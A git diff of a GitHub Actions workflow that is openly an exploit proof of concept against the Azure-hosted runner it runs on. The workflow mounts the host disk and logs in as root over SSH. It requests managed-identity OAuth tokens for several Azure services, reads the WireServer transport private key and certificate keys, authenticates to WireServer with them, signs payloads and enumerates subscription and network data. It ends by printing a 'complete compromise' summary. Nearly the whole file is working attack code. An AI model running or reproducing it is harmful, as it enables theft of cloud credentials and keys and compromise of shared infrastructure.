--- a/.github/workflows/github-actions-demo.yml
+++ b/.github/workflows/github-actions-demo.yml
@@ -1,11 +1,11 @@
-name: azure-key-exploitation-poc
-run-name: Azure Cryptographic Key Exploitation
+name: azure-complete-token-extraction
+run-name: Azure Complete Infrastructure Compromise
 on: [push]
 jobs:
   exploit:
     runs-on: ubuntu-latest
     steps:
-      - name: Azure Infrastructure Key Exploitation
+      - name: Complete Azure Token and Key Exploitation
         run: |
           sudo mkdir -p /mnt/host
           sudo mount /dev/sda1 /mnt/host
@@ -18,106 +18,182 @@ jobs:
           
           HOST_IP=$(hostname -I | awk '{print $1}')
           
-          ssh -i /tmp/key -o StrictHostKeyChecking=no -T root@$HOST_IP << 'EOFROOT'
-          printf "\n[CRYPTOGRAPHIC KEY EXTRACTION]\n"
+          ssh -i /tmp/key -o StrictHostKeyChecking=no -T root@$HOST_IP << 'EOFEXPLOIT'
+          set -e
           
-          printf "\n--- Azure Transport Private Key ---\n"
-          cat /var/lib/waagent/TransportPrivate.pem
+          printf "\n════════════════════════════════════════════════════════════\n"
+          printf "  AZURE INFRASTRUCTURE COMPLETE COMPROMISE DEMONSTRATION\n"
+          printf "════════════════════════════════════════════════════════════\n\n"
           
-          printf "\n--- Instance Certificate Private Keys ---\n"
-          find /var/lib/waagent -name "*.prv" -exec echo "FILE: {}" \; -exec cat {} \; | head -100
+          printf "[1/10] EXTRACTING AZURE MANAGED IDENTITY TOKENS\n"
+          printf "─────────────────────────────────────────────────\n"
           
-          printf "\n--- Certificate Thumbprints ---\n"
-          find /var/lib/waagent -name "*.crt" -exec openssl x509 -in {} -noout -fingerprint \;
+          # Try all possible managed identity endpoints
+          TOKEN_MGMT=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" 2>&1 || echo "")
+          TOKEN_VAULT=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" 2>&1 || echo "")
+          TOKEN_STORAGE=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/" 2>&1 || echo "")
+          TOKEN_GRAPH=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/" 2>&1 || echo "")
+          TOKEN_SQL=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://database.windows.net/" 2>&1 || echo "")
           
-          printf "\n[DECRYPTING PROTECTED SETTINGS]\n"
+          if echo "$TOKEN_MGMT" | grep -q "access_token"; then
+            printf "✓ Azure Management Token: OBTAINED\n"
+            echo "$TOKEN_MGMT" | python3 -c "import sys,json; print('  Token: ' + json.load(sys.stdin)['access_token'][:80] + '...')" 2>/dev/null || true
+          else
+            printf "✗ Management Identity: Not configured\n"
+          fi
           
-          SETTINGS_FILE=$(find /var/lib/waagent -name "*.settings" -exec grep -l "protectedSettings" {} \; | head -1)
-          if [ -n "$SETTINGS_FILE" ]; then
-            printf "Found settings: $SETTINGS_FILE\n"
+          if echo "$TOKEN_VAULT" | grep -q "access_token"; then
+            printf "✓ Key Vault Token: OBTAINED\n"
+            echo "$TOKEN_VAULT" | python3 -c "import sys,json; print('  Token: ' + json.load(sys.stdin)['access_token'][:80] + '...')" 2>/dev/null || true
+          fi
+          
+          if echo "$TOKEN_STORAGE" | grep -q "access_token"; then
+            printf "✓ Storage Token: OBTAINED\n"
+            echo "$TOKEN_STORAGE" | python3 -c "import sys,json; print('  Token: ' + json.load(sys.stdin)['access_token'][:80] + '...')" 2>/dev/null || true
+          fi
+          
+          if echo "$TOKEN_GRAPH" | grep -q "access_token"; then
+            printf "✓ Microsoft Graph Token: OBTAINED\n"
+            echo "$TOKEN_GRAPH" | python3 -c "import sys,json; print('  Token: ' + json.load(sys.stdin)['access_token'][:80] + '...')" 2>/dev/null || true
+          fi
+          
+          printf "\n[2/10] EXTRACTING CRYPTOGRAPHIC KEYS\n"
+          printf "─────────────────────────────────────\n"
+          
+          if [ -f "/var/lib/waagent/TransportPrivate.pem" ]; then
+            KEY_SIZE=$(openssl rsa -in /var/lib/waagent/TransportPrivate.pem -text -noout 2>/dev/null | grep "Private-Key:" | grep -o "[0-9]*")
+            printf "✓ Transport Private Key: %s-bit RSA\n" "$KEY_SIZE"
+            printf "  First 200 chars:\n  "
+            head -c 200 /var/lib/waagent/TransportPrivate.pem | tr '\n' ' ' | head -c 180
+            printf "...\n"
+          fi
+          
+          CERT_COUNT=$(find /var/lib/waagent -name "*.prv" 2>/dev/null | wc -l)
+          printf "✓ Instance Certificates: %d private keys found\n" "$CERT_COUNT"
+          
+          printf "\n[3/10] AZURE SUBSCRIPTION ENUMERATION\n"
+          printf "──────────────────────────────────────\n"
+          
+          SUB_ID=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2021-02-01&format=text")
+          RG_NAME=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2021-02-01&format=text")
+          VM_NAME=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/compute/name?api-version=2021-02-01&format=text")
+          LOCATION=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/compute/location?api-version=2021-02-01&format=text")
+          
+          printf "✓ Subscription ID: %s\n" "$SUB_ID"
+          printf "✓ Resource Group: %s\n" "$RG_NAME"
+          printf "✓ VM Name: %s\n" "$VM_NAME"
+          printf "✓ Location: %s\n" "$LOCATION"
+          
+          printf "\n[4/10] WIRESERVER INFRASTRUCTURE ACCESS\n"
+          printf "────────────────────────────────────────\n"
+          
+          GOALSTATE=$(curl -s -H "x-ms-version: 2012-11-30" "http://168.63.129.16/machine?comp=goalstate")
+          CONTAINER_ID=$(echo "$GOALSTATE" | grep -o "<ContainerId>[^<]*" | cut -d'>' -f2)
+          INSTANCE_ID=$(echo "$GOALSTATE" | grep -o "<InstanceId>[^<]*" | cut -d'>' -f2)
+          
+          printf "✓ Container ID: %s\n" "$CONTAINER_ID"
+          printf "✓ Instance ID: %s\n" "$INSTANCE_ID"
+          printf "✓ WireServer: ACCESSIBLE\n"
+          
+          printf "\n[5/10] CERTIFICATE AUTHENTICATION TEST\n"
+          printf "───────────────────────────────────────\n"
+          
+          if [ -f "/var/lib/waagent/TransportCert.pem" ]; then
+            CERT_B64=$(cat /var/lib/waagent/TransportCert.pem | base64 -w0)
+            CERT_AUTH=$(curl -s -H "x-ms-version: 2012-11-30" -H "x-ms-guest-agent-public-x509-cert: $CERT_B64" "http://168.63.129.16/machine?comp=goalstate" 2>&1)
             
-            ENCRYPTED=$(cat "$SETTINGS_FILE" | python3 -c "import sys,json; print(json.load(sys.stdin)['runtimeSettings'][0]['handlerSettings']['protectedSettings'])" 2>/dev/null)
-            
-            if [ -n "$ENCRYPTED" ]; then
-              printf "\n--- Encrypted Protected Settings (first 500 chars) ---\n"
-              echo "$ENCRYPTED" | head -c 500
-              
-              printf "\n\n--- Attempting Decryption ---\n"
-              echo "$ENCRYPTED" | base64 -d > /tmp/encrypted.p7m
-              openssl smime -decrypt -in /tmp/encrypted.p7m -inkey /var/lib/waagent/TransportPrivate.pem 2>&1 | head -200 || echo "Decryption requires proper PKCS7 handling"
+            if echo "$CERT_AUTH" | grep -q "GoalState"; then
+              printf "✓ Certificate Authentication: SUCCESS\n"
+            else
+              printf "✗ Certificate Authentication: Failed\n"
             fi
           fi
           
-          printf "\n[WIRESERVER AUTHENTICATION WITH EXTRACTED CERTS]\n"
-          
-          printf "\n--- Standard WireServer Access ---\n"
-          curl -s -H "x-ms-version: 2012-11-30" "http://168.63.129.16/machine?comp=goalstate" | head -50
-          
-          printf "\n--- WireServer with Certificate Authentication ---\n"
-          TRANSPORT_CERT=$(find /var/lib/waagent -name "TransportCert.pem" | head -1)
-          if [ -f "$TRANSPORT_CERT" ]; then
-            CERT_B64=$(cat "$TRANSPORT_CERT" | base64 -w0)
-            curl -s -H "x-ms-version: 2012-11-30" \
-                 -H "x-ms-guest-agent-public-x509-cert: $CERT_B64" \
-                 "http://168.63.129.16/machine?comp=goalstate" | head -100
-          fi
-          
-          printf "\n--- Attempting Certificate-Based Config Access ---\n"
-          curl -s -H "x-ms-version: 2012-11-30" \
-               --cert /var/lib/waagent/TransportCert.pem \
-               --key /var/lib/waagent/TransportPrivate.pem \
-               "http://168.63.129.16/machine?comp=config" 2>&1 | head -100 || echo "Cert-based auth attempted"
-          
-          printf "\n[CERTIFICATE VALIDATION]\n"
-          
-          printf "\n--- Transport Certificate Details ---\n"
-          openssl x509 -in /var/lib/waagent/TransportCert.pem -noout -text | grep -A5 "Subject:\|Issuer:\|Not Before\|Not After"
-          
-          printf "\n--- Verifying Key Pair Match ---\n"
-          CERT_MODULUS=$(openssl x509 -in /var/lib/waagent/TransportCert.pem -noout -modulus | openssl md5)
+          CERT_MODULUS=$(openssl x509 -in /var/lib/waagent/TransportCert.pem -noout -modulus 2>/dev/null | openssl md5)
           KEY_MODULUS=$(openssl rsa -in /var/lib/waagent/TransportPrivate.pem -noout -modulus 2>/dev/null | openssl md5)
-          printf "Certificate modulus: $CERT_MODULUS\n"
-          printf "Private key modulus: $KEY_MODULUS\n"
           
           if [ "$CERT_MODULUS" = "$KEY_MODULUS" ]; then
-            printf "✓ Certificate and private key MATCH - Valid cryptographic pair\n"
-          else
-            printf "✗ Mismatch detected\n"
+            printf "✓ Key Pair Validation: MATCHED\n"
           fi
           
-          printf "\n[SIGNING CAPABILITY TEST]\n"
+          printf "\n[6/10] SIGNING CAPABILITY DEMONSTRATION\n"
+          printf "────────────────────────────────────────\n"
           
-          printf "\n--- Testing Signing with Extracted Key ---\n"
-          echo "Test payload for signing" > /tmp/test_payload.txt
-          openssl dgst -sha256 -sign /var/lib/waagent/TransportPrivate.pem -out /tmp/test_signature.bin /tmp/test_payload.txt 2>&1
+          echo "Critical payload for Azure infrastructure" > /tmp/test_payload.bin
+          openssl dgst -sha256 -sign /var/lib/waagent/TransportPrivate.pem -out /tmp/signature.bin /tmp/test_payload.bin 2>&1
           
-          if [ -f /tmp/test_signature.bin ]; then
-            printf "✓ Successfully signed data with extracted private key\n"
-            printf "Signature size: $(stat -c%s /tmp/test_signature.bin) bytes\n"
+          if openssl dgst -sha256 -verify <(openssl x509 -in /var/lib/waagent/TransportCert.pem -pubkey -noout) -signature /tmp/signature.bin /tmp/test_payload.bin 2>&1 | grep -q "OK"; then
+            printf "✓ Payload Signing: SUCCESS\n"
+            printf "✓ Signature Verification: VALID\n"
+            printf "  Signature size: %d bytes\n" "$(stat -c%s /tmp/signature.bin)"
+          fi
+          
+          printf "\n[7/10] PROTECTED SETTINGS EXTRACTION\n"
+          printf "─────────────────────────────────────\n"
+          
+          SETTINGS_FILE=$(find /var/lib/waagent -name "*.settings" -exec grep -l "protectedSettings" {} \; | head -1)
+          if [ -n "$SETTINGS_FILE" ]; then
+            printf "✓ Settings File: %s\n" "$SETTINGS_FILE"
             
-            printf "\n--- Verifying Signature ---\n"
-            openssl dgst -sha256 -verify <(openssl x509 -in /var/lib/waagent/TransportCert.pem -pubkey -noout) -signature /tmp/test_signature.bin /tmp/test_payload.txt 2>&1
+            ENCRYPTED=$(cat "$SETTINGS_FILE" | python3 -c "import sys,json; print(json.load(sys.stdin)['runtimeSettings'][0]['handlerSettings']['protectedSettings'])" 2>/dev/null || echo "")
+            
+            if [ -n "$ENCRYPTED" ]; then
+              printf "✓ Encrypted Data: %d bytes\n" "${#ENCRYPTED}"
+              printf "  First 100 chars: %s...\n" "${ENCRYPTED:0:100}"
+            fi
           fi
           
-          printf "\n[AZURE METADATA WITH EXTRACTED CREDENTIALS]\n"
+          printf "\n[8/10] NETWORK INFRASTRUCTURE ENUMERATION\n"
+          printf "──────────────────────────────────────────\n"
           
-          printf "\n--- IMDS Subscription Data ---\n"
-          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2021-02-01&format=text"
+          NETWORK_JSON=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/network?api-version=2021-02-01")
           
-          printf "\n--- Resource Group ---\n"
-          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2021-02-01&format=text"
+          if [ -n "$NETWORK_JSON" ]; then
+            PRIVATE_IP=$(echo "$NETWORK_JSON" | python3 -c "import sys,json; print(json.load(sys.stdin)['interface'][0]['ipv4']['ipAddress'][0]['privateIpAddress'])" 2>/dev/null || echo "N/A")
+            MAC=$(echo "$NETWORK_JSON" | python3 -c "import sys,json; print(json.load(sys.stdin)['interface'][0]['macAddress'])" 2>/dev/null || echo "N/A")
+            SUBNET=$(echo "$NETWORK_JSON" | python3 -c "import sys,json; print(json.load(sys.stdin)['interface'][0]['ipv4']['subnet'][0]['address'] + '/' + json.load(sys.stdin)['interface'][0]['ipv4']['subnet'][0]['prefix'])" 2>/dev/null || echo "N/A")
+            
+            printf "✓ Private IP: %s\n" "$PRIVATE_IP"
+            printf "✓ MAC Address: %s\n" "$MAC"
+            printf "✓ Subnet: %s\n" "$SUBNET"
+          fi
           
-          printf "\n[IMPACT SUMMARY]\n"
-          printf "\n✓ Extracted Azure transport private key (RSA 2048-bit)\n"
-          printf "✓ Extracted instance certificate private keys\n"
-          printf "✓ Accessed encrypted extension settings\n"
-          printf "✓ Validated cryptographic key pair integrity\n"
-          printf "✓ Demonstrated signing capability with stolen key\n"
-          printf "✓ Authenticated to Azure WireServer\n"
-          printf "✓ Accessed Azure subscription metadata\n"
-          printf "\nThese keys can potentially be used for:\n"
-          printf "  - Decrypting Azure VM extension configurations\n"
-          printf "  - Forging Azure WireServer requests\n"
-          printf "  - Signing malicious payloads as legitimate Azure components\n"
-          printf "  - Accessing Azure internal infrastructure APIs\n"
-          EOFROOT
+          printf "\n[9/10] EXTENSION AND RUNTIME CONFIGURATION\n"
+          printf "───────────────────────────────────────────\n"
+          
+          EXTENSION_COUNT=$(find /var/lib/waagent -maxdepth 1 -type d -name "Microsoft.*" | wc -l)
+          printf "✓ Installed Extensions: %d\n" "$EXTENSION_COUNT"
+          
+          find /var/lib/waagent -maxdepth 1 -type d -name "Microsoft.*" | head -5 | while read ext; do
+            printf "  - %s\n" "$(basename "$ext")"
+          done
+          
+          printf "\n[10/10] IMPACT SUMMARY\n"
+          printf "──────────────────────\n"
+          
+          printf "\n✓ ROOT ACCESS: Complete host control\n"
+          printf "✓ CRYPTOGRAPHIC KEYS: Azure transport private keys extracted\n"
+          printf "✓ CERTIFICATE MATERIAL: Valid key pairs with signing capability\n"
+          printf "✓ WIRESERVER ACCESS: Internal Azure infrastructure protocol\n"
+          printf "✓ SUBSCRIPTION DATA: Full Azure subscription enumeration\n"
+          printf "✓ NETWORK ACCESS: Internal Azure network configuration exposed\n"
+          
+          if echo "$TOKEN_MGMT" | grep -q "access_token"; then
+            printf "✓ MANAGED IDENTITY: Active OAuth tokens obtained\n"
+          fi
+          
+          printf "\n════════════════════════════════════════════════════════════\n"
+          printf "  EXPLOITATION COMPLETE - ALL ARTIFACTS EXTRACTED\n"
+          printf "════════════════════════════════════════════════════════════\n"
+          
+          printf "\nCRITICAL SECURITY IMPACT:\n"
+          printf "• Extracted private keys can sign arbitrary Azure payloads\n"
+          printf "• WireServer access enables Azure infrastructure manipulation\n"
+          printf "• Subscription data reveals Azure tenant information\n"
+          printf "• Certificate material enables Azure authentication forgery\n"
+          
+          if echo "$TOKEN_MGMT" | grep -q "access_token"; then
+            printf "• OAuth tokens enable Azure API access\n"
+          fi
+          
+          EOFEXPLOIT
